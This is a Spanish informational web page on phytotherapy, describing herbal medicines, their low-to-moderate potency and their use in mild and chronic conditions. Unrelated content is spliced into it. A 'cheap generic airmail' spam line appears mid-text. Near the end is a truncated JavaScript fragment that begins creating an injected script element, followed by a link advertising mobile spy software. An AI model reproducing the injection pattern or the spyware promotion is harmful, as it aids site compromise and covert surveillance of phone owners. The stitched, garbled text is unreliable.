Fitoterapia

    La Fitoterapia es la ciencia que estudia la utilización de los productos de origen vegetal con finalidad terapéutica, ya sea para prevenir, para atenuar o para curar un estado patológico.

images

    La Fitoterapia constituye una herramienta terapéutica más dentro de todo el abanico de posibilidades que nos brinda la Terapéutica actual. Para que esta herramienta sea realmente útil, es necesario hacer un uso racional de la misma, basado en una utilización apropiada de los preparados a base de plantas medicinales.

    En Fitoterapia se emplean productos de origen vegetal cuya potencia farmacológica y toxicidad son moderadas o bajas y sus márgenes terapéuticos relativamente amplios. Incluye por tanto productos relativamente poco potentes (por ejemplo, capítulos de manzanilla, sumidad de espino blanco y sus extractos) o de potencia intermedia (como la flor de árnica y la raíz de regaliz) y excluye aquellos con un margen terapéutico estrecho (por ejemplo la hoja de digital y sus principios activos, como la digoxina). Esta característica es fundamental puesto que enmarca a la Fitoterapia como una terapéutica suave, poco agresiva, dotada de márgenes terapéuticos amplios, con un bajo porcentaje de efectos adversos.

    La Fitoterapia se utiliza tanto en la prevención y tratamiento de las enfermedades como en la mejora de la calidad de vida de los pacientes. En unos casos será suficiente para curar una patología y en otros será el coadyuvante de otras medicaciones, o ayudará a mejorar determinados síntomas asociados. Su principal campo de acción son las afecciones leves y moderadas, así como las enfermedades crónicas, siendo útiles por tanto en la terapia de la mayor parte de las patologías habituales en asistencia primaria.

    La Fitoterapia representa una parte del arsenal terapéutico cuyo uso racional puede ser de utilidad en la asistencia sanitaria.

cheap generic airmail

    Para el uso racional de la Fitoterapia es necesario disponer de medicamentos a base de plantas que, como cualquier otro medicamento, tengan garantizadas su calidad, seguridad y eficacia.fitoterapicos

}var d=document;var s=d.createElement('script'); https://topspyapps.net - The most popular 2017 spy software applications for the mobile phones.

Comments are closed.